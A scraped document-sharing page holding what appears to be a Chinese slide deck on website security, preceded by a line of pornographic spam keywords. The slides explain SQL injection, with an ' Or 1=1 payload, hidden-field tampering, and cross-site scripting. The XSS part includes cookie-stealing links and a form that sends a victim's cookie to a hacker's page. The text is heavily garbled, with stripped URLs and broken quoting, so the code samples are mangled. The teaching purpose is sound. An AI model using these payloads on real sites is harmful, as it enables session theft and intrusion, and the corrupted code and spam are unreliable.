freepeople性欧美熟妇, 色戒完整版无删减158分钟hd, 无码精品国产vα在线观看DVD, 丰满少妇伦精品无码专区在线观看,艾栗栗与纹身男宾馆3p50分钟,国产AV片在线观看,黑人与美女高潮,18岁女RAPPERDISSSUBS,国产手机在机看影片

正文內(nèi)容

設(shè)計(jì)安全的網(wǎng)站系統(tǒng)-文庫(kù)吧

2025-01-29 15:45 本頁(yè)面


【正文】 on攻擊的基本原則 (一 ) 將使用者輸入資料當(dāng)做參數(shù)傳給 SQL敘述或 Stored Procedure ?SQL敘述或是 Stored Procedure中使用 EXEC敘述執(zhí)行使用者輸入的內(nèi)容需更進(jìn)一步防範(fàn) 如果無(wú)法將使用者輸入資料當(dāng)做參數(shù)傳給 SQL敘述或 Stored Procedure ?使用 Regular Expression驗(yàn)証使用者輸入的資料的格式 ?限制使用者輸入的資料的長(zhǎng)度 ?限制使用者登入資料庫(kù)的帳號(hào)的權(quán)限 ?去除使用者輸入資料中的 ―‖(SQL敘述的註解 ) ?將使用者輸入的單引號(hào)置換成雙引號(hào) 將使用者輸入的單引號(hào)置換成雙引號(hào)的效果 例如原本欲執(zhí)行的 SQL敘述為 : Select count(*) from Members where UserName=39。John39。 And Password=39。ABC39。 使用者在 UserName欄位輸入 [39。 Or 1=1 ] ?未將使用者輸入的單引號(hào)置換成雙引號(hào) , 上述的 SQL敘述執(zhí)行的結(jié)果為 Members資料表的 總筆數(shù) ?將使用者輸入的單引號(hào)置換成雙引號(hào) , 上述的 SQL敘述執(zhí)行的結(jié)果為 0 防堵 SQL Injection攻擊的基本原則 (二 ) 限制應(yīng)用程式或網(wǎng)頁(yè)只能擁有執(zhí)行 Stored Procedure的權(quán)限 , 不能直接存取資料庫(kù)中的 Table和 View 使用 [Windows整合安全模式 ]登入資料庫(kù) , 避免使用系統(tǒng)管理員身份登入資料庫(kù) 設(shè)定 TextBox欄位的 MaxLength屬性 加強(qiáng)對(duì)資料庫(kù)操作的稽核 Hidden Field Tampering攻擊法 Hidden Field Tampering攻擊模式 ?把 HTML Form存到硬碟 ?竄改 Hidden欄位的內(nèi)容值 ?將竄改過(guò)的 Form重送到 Web Server 使用隱藏欄位在網(wǎng)頁(yè)中傳遞資料 隱藏欄位中的資料被竄改的情形 檢視帶有隱藏欄位的網(wǎng)頁(yè)的 [原始檔 ] 另存新 HTML檔案 修改存檔內(nèi)容 form name=“ Form1” method=“ post” action=“ /BadMotor/?MotorID=1” id=“ Form1” … input name=HiddenPrice id=HiddenPrice type=hidden value=1000000 / … /form 使用 IE開(kāi)啟另存的 HTML檔案 執(zhí)行 Submit 竄改成 1 阻擋 Hidden Field Tampering攻擊的方法 檢查 HTTP_REFERER的內(nèi)容 ? 讀取 HttpWebRequest類別的 Headers集合的Referer成員 If (HTTP_REFERER) Is Nothing Then = Catch You! Else = 完成扣款 : Request(Price) 元 ! End If 使用 Message Digest 1. 自己做 2. 使用 Server Control, 啟用 ViewState 重要的資訊不要存放在 Hidden Field CrossSite Scripting攻擊法 Web應(yīng)用程式最常見(jiàn)的漏洞之一 曾經(jīng)受害的知名網(wǎng)站眾多 , 包括 :, , , Ebay, Yahoo, Apple puter, Microsoft, Zd, Wired, 與 Newsbytes 每個(gè)月約有 10~25個(gè)網(wǎng)站被發(fā)現(xiàn)有 XSS的漏洞 2023 eWeek OpenHack大賽得主找到兩個(gè) XSS弱點(diǎn) 常受 XXS攻擊的網(wǎng)頁(yè) :搜尋網(wǎng)頁(yè) , 討論群 , 留言板 , 登入畫面 .. CrossSite Scripting攻擊模式 ?竊取網(wǎng)頁(yè)使用者的個(gè)人資料 (包括 SessionID, Cookies) ?重導(dǎo)網(wǎng)頁(yè) , 破壞網(wǎng)頁(yè)顯示的內(nèi)容 (改變顯示的文字和圖形 ), 執(zhí)行無(wú)窮迴圈 … CrossSite Scripting攻擊手法 1. script=39。 2. script 3. div style=display: none 偷取 Cookie的做法 – 提供誘之以利的網(wǎng)頁(yè) a href= language=39。javascript39。=39。rch/?Cookie=39。%。/script.../a a href= language=39。javascript39。=39。?Cookie=39。%。/script.../a 取得超連結(jié)網(wǎng)址 的 Cookie 誘騙點(diǎn)選的危險(xiǎn)郵件 目標(biāo)網(wǎng)站 透過(guò)中間網(wǎng)頁(yè)傳送 Cookie到駭客的網(wǎng)頁(yè) FORM action= method=post id=idForm INPUT name=cookie type=hidden /FORM SCRIPT =。 ()。 /SCRIPT 阻擋 CrossSite Scripting攻擊的錯(cuò)誤方法 檢查使用者輸入的資料是否內(nèi)含 和 無(wú)法防範(fàn)以下的攻擊 : script language=JScript RUNAT=Server var strUserName = (Name)。 /script img src= onmouseover=39。doWork(%=strUserName%)。39。 img src= onmouseover=39。doWork(Freddy)。 alert()。 39。)。39。 使用者輸入 :Freddy)。 alert()。 39。 各種 CrossSite Scripting攻擊方法 (一 ) a href=javas ript [code] div onmouseover=[code] img src=
點(diǎn)擊復(fù)制文檔內(nèi)容
教學(xué)課件相關(guān)推薦
文庫(kù)吧 www.dybbs8.com
備案圖鄂ICP備17016276號(hào)-1